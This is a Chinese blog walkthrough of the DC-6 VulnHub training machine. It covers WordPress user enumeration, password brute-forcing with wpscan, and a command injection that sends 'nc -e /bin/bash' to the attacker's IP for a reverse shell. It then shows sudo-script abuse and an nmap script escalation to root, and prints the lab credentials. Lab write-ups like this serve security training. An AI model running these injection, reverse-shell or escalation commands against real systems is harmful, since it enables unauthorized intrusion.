DC-6 靶机

最新推荐文章于 2024-06-14 13:37:46 发布
最新推荐文章于 2024-06-14 13:37:46 发布
阅读量180 收藏
点赞数
分类专栏: 渗透测试 文章标签: 网络安全 网络 web安全 安全 服务器 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51559599/article/details/134000840
版权

DC_6

信息搜集

存活检测

在这里插入图片描述

详细扫描

image-20231023165338741

需要添加 DNS 解析

vim /etc/hosts

image-20231023165450298

后台网页扫描

dirsearch -u http://10.4.7.150

image-20231023165740307

网页信息搜集

  • 使用 wappalyzer 插件识别 cms 指纹,发现为熟悉的 WordPress

    image-20231023172017074

  • 并且发现了网站的登陆页面

    image-20231023172452558

  • 直接上 wpscan

    扫描用户

    wpscan --url http://wordy --enumerate u

    扫描出如下用户,将用户写入 users 文件中以供爆破

    image-20231023174329291

  • 尝试 cewl 生成密码字典

    image-20231023174804359

  • 爆破

    image-20231023175229931

  • 爆破失败

    image-20231023175257084

  • rockyou 字典爆破

    image-20231023212103641

    dc6 官网上提示过滤一些密码可以提升爆破速度

    cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

    wpscan --url http://wordy --passwords passwords.txt --usernames users

    image-20231023212303251

  • 成功爆破

    用户名 mark

    密码 helpdesk01

    image-20231023213537470

  • 登录网页

    image-20231023213733116

Webshell

  • 搜索框内尝试命令注入

    image-20231023214759279

  • kali 开启 nc 监听

    image-20231023214840083

  • 输入连接反弹 shell 的命令

    10.1.1.1|nc -e /bin/bash 10.4.7.146 7777

    有长度限制

    image-20231023215002694

  • 修改源码中允许的最大长度

    输入反弹命令,点击 Lookup 连接

    image-20231023215429620

  • 成功反弹

    image-20231023215447981

ssh登录

  • 反弹成功后搜集系统中有用信息

    在 /hoomr/mark/stuff 下发现了包含 graham 密码的文件

    密码为 GSo7isUM1D4

    image-20231023220034640

    尝试 ssh 登录

  • 成功登录

    image-20231023220149331

提权

  • sudo -l 查看权限

    image-20231023220219626

  • 发现 jens 可以无需密码以 root 权限运行 /home/jens/backups.sh

  • 查看 backup.sh 文件

    image-20231023220904917

    发现是一个压缩命令

  • 查看文件权限

    image-20231023220931296

    所属组拥有全部权限

  • 查看 graham 信息

    image-20231023221450772

    发现与 jens 同属一个组,拥有对文件的修改权限

  • 向文件中写入提权命令

    echo bash >> backups.sh

    image-20231023221548032

  • sudo 执行

    sudo -u jens /home/jens/backups.sh

    image-20231023222159317

  • 切换到 jens 用户

    image-20231023222240231

  • sudo -l 查看 root 权限

    image-20231023222319457

  • nmap 提权

    TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF

    image-20231023223242815

  • 提权成功

    image-20231023223314391

总结

  • 命令注入,绕过
  • wpscan 用户扫描,密码爆破
  • nmap 提权
gjl_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
DC-6靶机
mlws1900的博客
03-26 1158
开放了一个http和ssh服务,用浏览器打开http服务,发现无法访问,和之前一样,去修改dns文件。登录地址(wordpress的后台地址,信息搜集,目录扫描,都做到这里了,不再做演示)发现可操作/home/jens/backups.sh,打开发现是一个解压的脚本。命令注入,打开bp进行抓包,在ip那一栏填上一个网址,点击lookup。不知道为什么,我这个shell不会显示我自己打的命令,所以需要自己盲打。设置网络为nat模式,启动打开时,发现错误直接重试和点是。看了大佬的wp,发现提示写在人家官网。
vulnhub靶场之DC-6
qq_58091216的博客
01-11 1002
只有一个flag。
DC6靶场渗透流程(超详细)
m0_64583632的博客
04-10 799
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
DC-6靶场实战
qq_42754807的博客
03-26 809
DC-6靶场实战
DC靶机系列:DC-6
Ays.Ie的博客
02-28 525
本篇文章为DC系列第6个靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
DC-6靶机攻略
真正的大师,永远都怀着一颗学徒的心。
08-01 1838
文章目录前言一、信息收集1,确定IP以及开放端口2,访问对方80端口3,登入对方后台二、反弹shell与提权1.得到SSH账号2.登陆对方SSH3,切换用户并提权 前言 DC-1靶机攻略 DC-2靶机攻略 DC-4靶机攻略 本篇将介绍DC-6的靶机攻略 一、信息收集 1,确定IP以及开放端口 2,访问对方80端口 这里和DC-2很像,直接输入IP无法访问80,需要配置etc/hosts文件 配置后成功进入目标网站,发现是由WordPress搭建。直接上WPscan WPScan是Kali Linu
DC-6靶机渗透
m0_62008601的博客
05-31 533
攻击机kali:192.168.56.102 靶机dc-6:192.168.56.107 为确保两台服务器在同一网段下,我这里dc-6的网络设置为仅主机网络,kali的设置为桥接模式,这样才能通过kali扫描出dc-6靶机的ip。 配置好环境之后就可以开始操作了 扫描存活的主机 扫描靶机开放的端口 看到开放了80端口和22端口,浏览器进行访问 无法访问,这个问题和前面的一个靶机类似,存在域名解析错误,知道了域名为wordy,就可以去hosts文件(在/etc/hosts).
DC-6靶机渗透测试详细教程
啊醒的博客
05-04 2469
DC-6靶机渗透测试详细教程
vulnhub DC-6靶机实战
m0_51195235的博客
10-31 772
vulnhub靶机实战
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
dc-4靶机练习.docx
01-02
靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8287
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
nc网络收发测试-tcp客户端\TCP服务器\UDP\UDP广播
06-14 239
nc网络收发测试-tcp客户端
面向云计算平台的信息安全等级保护测评实践与建议
ddcajdkdl的博客
06-14 539
面向云计算平台的信息安全等级保护测评是一项系统工程,需要政府、云服务商、用户及第三方测评机构等多方共同努力,通过持续的技术创新与管理优化,确保云计算环境下的信息安全,为数字经济发展提供坚实的安全保障。
计算机网络(6) ICMP协议
最新发布
qq_42761215的博客
06-14 325
ICMP是网络通信中不可或缺的协议,虽然不传输用户数据,但在网络管理和诊断中起着重要作用。理解ICMP及其各种消息类型对于网络管理员和工程师来说是至关重要的,它有助于维护网络的正常运行和性能优化。
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值